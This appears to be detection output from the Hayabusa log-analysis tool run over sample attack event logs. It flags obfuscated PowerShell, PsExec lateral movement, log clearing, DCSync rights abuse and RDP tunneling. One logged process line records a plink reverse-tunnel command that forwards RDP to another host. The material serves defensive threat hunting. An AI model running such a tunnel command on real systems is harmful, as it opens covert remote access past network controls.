2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.300 +09:00,SEC511,4104,low,Evas,Use Remove-Item to Delete File,,rules/sigma/powershell/powershell_script/posh_ps_remove_item_path.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:17:12.146 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Exec,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:18:01.084 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:22:37.536 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:23:59.512 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:25:40.262 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:27:04.659 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:56:34.470 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:58:22.516 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:59:31.974 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 04:01:22.441 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 04:12:28.360 +09:00,SEC511,4104,high,Exec,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/posh_ps_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 04:15:23.660 +09:00,SEC511,4104,high,Exec,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/posh_ps_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 04:25:48.647 +09:00,SEC511,4104,high,Exec,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx
2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: blabla.exe | IP Addr: 10.0.2.16 | LID: 0x162630,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: blabla.exe | IP Addr: 10.0.2.16 | LID: 0x162630,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-19 22:00:10.540 +09:00,IEWIN7,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-20 16:00:50.800 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Evas,Security Log Cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_bloodhound.evtx
2019-01-20 16:29:57.863 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Evas,Security Log Cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_psloggedon.evtx
2019-02-02 18:16:52.479 +09:00,ICORP-DC.internal.corp,4776,info,,NTLM Logon To Local Account,User: helpdesk | Computer: evil.internal.corp | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
2019-02-02 18:17:22.562 +09:00,ICORP-DC.internal.corp,4776,info,,NTLM Logon To Local Account,User: EXCHANGE$ | Computer: EXCHANGE | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
2019-02-02 18:17:22.563 +09:00,ICORP-DC.internal.corp,4624,info,,Logon Type 3 - Network,User: EXCHANGE$ | Computer: EXCHANGE | IP Addr: 192.168.111.87 | LID: 0x24daa6,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
2019-02-02 18:17:22.563 +09:00,ICORP-DC.internal.corp,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
2019-02-14 00:15:04.175 +09:00,PC02.example.corp,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
2019-02-14 00:15:08.689 +09:00,PC02.example.corp,4624,low,,Logon Type 5 - Service,User: sshd_server | Computer: PC02 | IP Addr: - | LID: 0xe509,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
2019-02-14 00:19:51.259 +09:00,PC02.example.corp,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: PC02 | IP Addr: 127.0.0.1 | LID: 0x21f73 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,info,,Logon Type 10 - RDP (Remote Interactive),User: IEUser | Computer: PC02 | IP Addr: 127.0.0.1 | LID: 0x45120 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,high,LatMov,RDP Login from Localhost,,rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
2019-02-14 00:29:40.657 +09:00,PC02.example.corp,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: PC02 | IP Addr: 127.0.0.1 | LID: 0x4a26d | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
2019-02-14 00:31:19.529 +09:00,PC02.example.corp,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: PC01 | IP Addr: 10.0.2.17 | LID: 0x73d02,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
2019-02-14 00:31:31.556 +09:00,PC02.example.corp,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: PC01 | IP Addr: 10.0.2.17 | LID: 0x7d4f4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
2019-02-14 03:01:41.593 +09:00,PC01.example.corp,1102,high,Evas,Security Log Cleared,User: admin01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4624,info,,Logon Type 11 - CachedInteractive,User: user01 | Computer: PC01 | IP Addr: 127.0.0.1 | LID: 0x1414c8 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-11-CachedInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: PC01$ | Target User: user01 | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4624,info,,Logon Type 7 - Unlock,User: user01 | Computer: PC01 | IP Addr: - | LID: 0x1414d9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-7-Unlock.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: PC01$ | Target User: user01 | IP Address: - | Process: C:\Windows\System32\lsass.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,Evas | C2 | LatMov,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,Evas | C2 | LatMov,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:43.171 +09:00,PC01.example.corp,4672,info,,Admin Logon,User: admin01 | LID: 0x14871d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,Evas | C2 | LatMov,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,Evas | C2 | LatMov,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:57.442 +09:00,PC01.example.corp,4672,info,,Admin Logon,User: admin01 | LID: 0x148f5d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,info,,Logon Type 10 - RDP (Remote Interactive),User: admin01 | Computer: PC01 | IP Addr: 127.0.0.1 | LID: 0x14a321 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4672,info,,Admin Logon,User: admin01 | LID: 0x14a321,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: PC01$ | Target User: admin01 | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,high,LatMov,RDP Login from Localhost,,rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,low,LatMov,Admin User Remote Logon,,rules/sigma/builtin/security/win_admin_rdp_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-16 19:01:46.884 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:1900 () | Dst: 10.0.2.16:57182 () | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:01:50.699 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\plink.exe | PID: 3520 | PGUID: 365ABB72-DD79-5C67-0000-00109C931000,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test | Process: C:\Users\IEUser\Desktop\plink.exe | User: PC01\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x26656 | PID: 2312 | PGUID: 365ABB72-DFAD-5C67-0000-0010E0811500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,medium,Exfil | C2,Exfiltration and Tunneling Tools Execution,,rules/sigma/process_creation/proc_creation_win_exfiltration_and_tunneling_tools_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,high,C2 | LatMov,Suspicious Plink Remote Forwarding,,rules/sigma/process_creation/proc_creation_win_susp_plink_remote_forward.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:02:22.965 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:49185 (PC01.example.corp) | Dst: 10.0.2.18:80 (PC02) | User: PC01\IEUser | Process: C:\Users\IEUser\Desktop\plink.exe | PID: 2312 | PGUID: 365ABB72-DFAD-5C67-0000-0010E0811500,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:02:48.502 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.1:49186 (PC01.example.corp) | Dst: 127.0.0.2:3389 () | User: PC01\IEUser | Process: C:\Users\IEUser\Desktop\plink.exe | PID: 2312 | PGUID: 365ABB72-DFAD-5C67-0000-0010E0811500,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:02:48.502 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.2:3389 () | Dst: 127.0.0.1:49186 (PC01.example.corp) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:02:48.502 +09:00,PC01.example.corp,3,high,LatMov,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:03:02.272 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:80ac:4126:fa58:1b81:64763 (PC01.example.corp) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:03:02.272 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:61400 (PC01.example.corp) | Dst: 224.0.0.252:5355 () | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:03:47.086 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:1900 () | Dst: 10.0.2.16:59304 () | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:03:48.058 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: PC01\IEUser | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x26656 | PID: 2504 | PGUID: 365ABB72-E004-5C67-0000-00107C9B1500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:03:48.078 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\UI0Detect.exe | PID: 2504 | PGUID: 365ABB72-E004-5C67-0000-00107C9B1500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.141 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 3444 | PGUID: 365ABB72-E014-5C67-0000-0010FCA01500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.151 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 3344 | PGUID: 365ABB72-E014-5C67-0000-00104AA11500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.221 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\smss.exe | PID: 3444 | PGUID: 365ABB72-E014-5C67-0000-0010FCA01500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.221 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 2516 | PGUID: 365ABB72-E014-5C67-0000-001013A21500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.231 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\rdpdd.dll | Status: Valid | Hash: SHA1=853533AD0FD5081E57931D98CF5B1CD4ACBF0601,rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.231 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\rdpdd.dll | Status: Valid | Hash: SHA1=853533AD0FD5081E57931D98CF5B1CD4ACBF0601,rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
